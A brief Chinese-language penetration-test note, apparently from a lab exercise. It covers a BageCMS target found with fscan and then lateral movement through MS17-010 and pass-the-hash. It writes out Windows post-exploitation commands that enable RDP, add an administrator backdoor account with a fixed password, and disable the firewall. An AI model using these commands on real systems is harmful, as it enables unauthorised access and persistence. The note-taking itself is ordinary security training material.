BageCMS #
fscan扫描到9652端口运行着CMS,版本大概率是3.1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
可以看到还存在192.168.20.10的段
MS17-010 #
搭建代理后进行内网扫描,发现存在MS17-010
PTH #
添加完用户后走kali的xfreerdp上去关掉设置